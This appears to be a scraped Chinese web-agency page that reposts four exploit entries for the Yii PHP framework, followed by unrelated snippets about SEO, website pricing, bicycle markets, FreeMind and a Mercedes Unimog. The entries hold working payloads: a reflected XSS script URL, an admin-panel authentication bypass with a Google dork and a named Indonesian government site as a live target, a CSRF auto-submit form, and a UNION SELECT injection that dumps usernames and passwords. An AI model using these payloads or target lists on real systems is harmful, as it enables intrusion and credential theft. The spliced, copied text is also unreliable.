一Yii Framework 2.0.9 - Cross Site ScriptingPublished
# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting # Discovery Date: 2019-02-12 # Exploit Author: Gionathan "John" Reale# Vendor Homepage: https://www.yiiframework.com/# Version: 2.0.9 # CVE : 2018-6010In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.Example:http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E
二Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
################################################################################################## Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army# Date : 01/07/2018# Vendor Homepage : yiiframework.com# Tested On : Windows# Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~ github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin+ yiiframework.com/extension/rbac-manager ~ yiiframework.com/extension/yii2-admin ~+ travis-ci.org/mdmsoft/yii2-admin ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master+ codeclimate.com/github/mdmsoft/yii2-admin# Category : WebApps# Versions : 2.x and 3.x# Exploit Risk : Medium# CWE : CWE-287 [ Improper Authentication ]################################################################################################## Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication VulnerabilityYii Framework yii2-admin RBAC Manager for Yii 2GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user Features of the Product [ Software ]Manage RBAC System in intuitive Tree-ViewCeep cool with rekursion protection in RBAC TreeGenerate PHP CodeFull relational move, create, edit, delete support of RBAC Tree items.Assign and eject multiple Roles to and from multiple UsersCreate predefined buisness Rules for User AssignmentsAssign Roles in Secure ModeBy Controller protected and not changeable Roles and AssignmentsUse easy checkAccess() methods in your ControllerCreate easy bizRule Code in your RBAC Roles and Assignments################################################################################################# Description for Improper Authentication Vulnerability [ CWE-287 ]+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.+ If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering (e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges within the application or disclose sensitive information.+ If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page:+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.+ Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration.+ The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code.+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]################################################################################################## Google Dork : inurl:''/emusrenbang/web/index.php?r=''# Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin# Exploit : No Username. No Password. No Need for Login Credentials. Web don't need login. Just enter this link after URL Link./emusrenbang/web/index.php?r=adminWhatever you give an exploit like [ anything' OR 'x'='x ] or [ '=''or' ] and many others as SQL Authentication Bypass. It always says that '' Incorrect username or password. '' But we will jump over the admindoor wall. This is called as Improper Authentication Vulnerability.127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] => archive.is/BLaE5127.0.0.1/emusrenbang/web/index.php?r=admin => [ Proof of Concept ] => archive.is/D9dKPUseable Admin Control Panel URL Links => /emusrenbang/web/index.php?r=admin/emusrenbang/web/index.php?r=admin%2Fassignment/emusrenbang/web/index.php?r=admin%2Frole/emusrenbang/web/index.php?r=admin%2Fpermission/emusrenbang/web/index.php?r=admin%2Froute/emusrenbang/web/index.php?r=admin%2Frule/emusrenbang/web/index.php?r=admin%2Fmenu/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex#################################################################################################Indonesia Government Site [ Bappeda Provinsi Sumatera Utara 2016 ] is only vulnerable website.# Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu # [ Proof of Concept ] => archive.is/lCRem################################################################################################## Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
三Yii Framework Blog Cross Site Request Forgery
# Exploit Title: Yii Framework Blog Application CSRF Vulnerability# Date: 3 Mar 2014# Author: Christy Philip Mathew# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/# Category:: web# Tested on: Windows 8Attacker will be able to create a post.<html> <body> <form action="http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST"> <input type="hidden" name="Post[title]" value="test" /> <input type="hidden" name="Post[content]" value="test" /> <input type="hidden" name="Post[tags]" value="test" /> <input type="hidden" name="Post[status]" value="2" /> <input type="hidden" name="yt0" value="Create" /> <input type="submit" value="Submit form" /> </form> </body></html>
四Yii Framework Search SQL Injection Vulnerability
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability# Google Dork: No Dork# Date: 20/11/2012# Exploit Author: Juno_okyo# Vendor Homepage: http://www.yiiframework.com/# Software Link: http://www.yiiframework.com/download/# Version: 1.1.8 (maybe another version)#####Vulnerability:################################## SQL Injection via search form. You can query to get some info aboutadministrator account and something... ##################################Exploitation:################################## 'unionSELECT1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31fRom user-- - ##################################More Details:################################## Website: http://junookyo.blogspot.com/About Exploit:http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ##################################Great thanks to Juno_okyo and James - J2TeaM##################################
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability# Google Dork: No Dork# Date: 20/11/2012# Exploit Author: Juno_okyo# Vendor Homepage: http://www.yiiframework.com/# Software Link: http://www.yiiframework.com/download/# Version: 1.1.8 (maybe another version)#####Vulnerability:################################## SQL Injection via search form. You can query to get some info aboutadministrator account and something... ##################################Exploitation:################################## 'unionSELECT1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31fRom user-- - ##################################More Details:################################## Website: http://junookyo.blogspot.com/About Exploit:http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ##################################Great thanks to Juno_okyo and James - J2TeaM##################################
本文由 貴州做網站公司 整理發布,部分圖文來源于互聯網,如有侵權,請聯系我們刪除,謝謝!
網絡推廣與網站優化公司(網絡優化與推廣專家)作為數字營銷領域的核心服務提供方,其價值在于通過技術手段與策略規劃幫助企業提升線上曝光度、用戶轉化率及品牌影響力。這...
在當今數字化時代,公司網站已成為企業展示形象、傳遞信息和開展業務的重要平臺。然而,對于許多公司來說,網站建設的價格是一個關鍵考量因素。本文將圍繞“公司網站建設價...
在當今的數字化時代,企業網站已成為企業展示形象、吸引客戶和開展業務的重要平臺。然而,對于許多中小企業來說,高昂的網站建設費用可能會成為其發展的瓶頸。幸運的是,隨...
天津山地自行車批發市場在哪?天津民權門批發市場,叫天津北自行車商城,全是電動車,就在金鐘赫立交橋前面,609路:廣海廟到江路,633路,646路下車誰知道天津市內哪里有比較大的自行車批發市場?河北區的關羽路和南口路是天津自行車一條街的所在地,這里大概有幾十家自行車店,大部分都是自行車廠家的銷售點,正規而且很便宜(可以砍價)。等級都有,過了北洋橋就行,離江不遠。天津哪有專門賣自行車的大型市場?自行車...
如何使用freemind制作思維導圖教程?打開FreeMind,雙擊屏幕中間的“新思維導圖”節點,編輯節點中的內容。也可以選擇節點并按F2鍵進行編輯。點擊“插入”菜單中的某一項,插入新的節點,包括子節點、父節點、平行節點以及鏈接、圖片、線條等,對于節點位置的操作,如節點左移、上移、折疊、展開等,可以使用菜單欄中的“導航”命令??梢酝ㄟ^菜單欄的“編輯”命令進行復制、剪切、粘貼等操作。最后,編輯完成后...
奔馳烏莫尼克多少錢?500W左右的w .軍車,已經失去了市場,基本都是訂購,在私家車市場買不到。烏尼莫克房車2022最新售價?2022最新純進口奔馳品牌Unimoc房車銷售價格1300萬元。如果真的想買,和賣家溝通一下,可能會有折扣價。全新四驅奔馳U4023越野房車的銷量,正成為奔馳細分市場的驕傲,如同樸實的埃森人。凸起的前格柵與另一款奔馳經典越野車的G級頗為相似,橫向的中格柵體現了其最純粹的越...